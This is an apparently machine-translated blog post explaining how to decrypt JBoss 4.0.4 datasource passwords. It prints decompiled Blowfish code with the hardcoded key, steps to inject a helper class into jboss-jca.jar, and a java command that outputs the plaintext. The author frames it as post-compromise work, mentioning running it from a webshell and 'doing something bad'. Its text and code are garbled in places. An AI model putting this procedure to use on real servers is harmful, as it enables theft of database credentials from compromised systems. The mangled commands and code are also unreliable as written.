Summary of issues about JBOSS decryption database connection pool

I used JDgui and read the decryption methods of the predecessors. I have never succeeded.
In jboss, data source passwords can be encrypted. There are many related articles. Here I will talk about how to crack them.

Jboss-4.0.4.GA as an example, the principle of decryption is very simple, first find the method used for encryption:
Java-cp "xxx. jar ...... "Org. jboss2.resource. security. SecureIdentityLoginModule 13456 Encryption Method


Okay, find the package jboss-jca.jar where SecureIdentityLoginModule is located, and find SecureIdentityLoginModule. class, a slight decompilation is completely clear. encryption uses: private static String encode (String secret), which is naturally decrypted:

private static char[] decode(String secret) private static String encode(String secret)     throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException   {     byte[] kbytes = "jaas is the way".getBytes();     SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish");     Cipher cipher = Cipher.getInstance("Blowfish");     cipher.init(1, key);     byte[] encoding = cipher.doFinal(secret.getBytes());     BigInteger n = new BigInteger(encoding);     return n.toString(16);   }   private static char[] decode(String secret)     throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException   {     byte[] kbytes = "jaas is the way".getBytes();     SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish");     BigInteger n = new BigInteger(secret, 16);     byte[] encoding = n.toByteArray();     Cipher cipher = Cipher.getInstance("Blowfish");     cipher.init(2, key);     byte[] decode = cipher.doFinal(encoding);     return new String(decode).toCharArray();   }   public static void main(String[] args)     throws Exception   {     String encode = encode(args[0]);     System.out.println("Encoded password: " + encode);   } } 

Okay, encryption and decryption parameters. The most important thing is how to execute the code in webshell. I read the decryption code of Daniel's door. I tested it online. It's not successful. I don't know if it's a castrated version.

Byte [] kbytes = "jaas is the way". getBytes ()The key point is that the previous Daniel came out in July.

Now I am talking about my 2B stupid method. You can try it. The code on the first page of DU Niang is all biased. I sorted it out.

Create a file
Jboss-4.0.4.GA \ server \ default \ lib \ A. java, content:

Package org. jboss. resource. security; what I cannot understand is the meaning of function A. Directly paste the code and class A {public static void main (String args []) throws Exception {SecureIdentityLoginModule seq = new SecureIdentityLoginModule (); char [] decode = seq. decode (args [0]); System. out. println ("Haha, DEcoded password:" + new String (decode ));}}

Create a file
Create another file

SecureIdentityLoginModule.java：package org.jboss.resource.security; SecureIdentityLoginModule.java： package org.jboss.resource.security; class SecureIdentityLoginModule{     static String encode(String s){         return s;         }          static char[] decode(String s){         return new char[100];         } } 

This SecureIdentityLoginModule can be compiled separately, and then put the compiled SecureIdentityLoginModule. class into \ jboss-4.0.4.GA \ server \ default \ lib \ org \ jboss \ resource \ security

Last step, add the compiled A. class to the jboss-jca.jar package (back up before doing something bad ).


Call method:
Java-cp "D: \ jboss-4.0.4.GA \ lib \ jboss-jmx.jar; D: \ jboss-4.0.4.GA \ lib \ jboss-common.jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jboss-jca.jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jbosssx. jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jboss-jca.jar "org. jboss. resource. security. A encrypted string linux is directly to D into/home/jboss-4.0.4.GA \ lib \ jboss-jmx.jar; wait, I will package these four files to the local directory directly. Assume that the java environment can be used. It's all common.
I didn't use the directly compiled file to leave this post. I can also help you with it if you need it.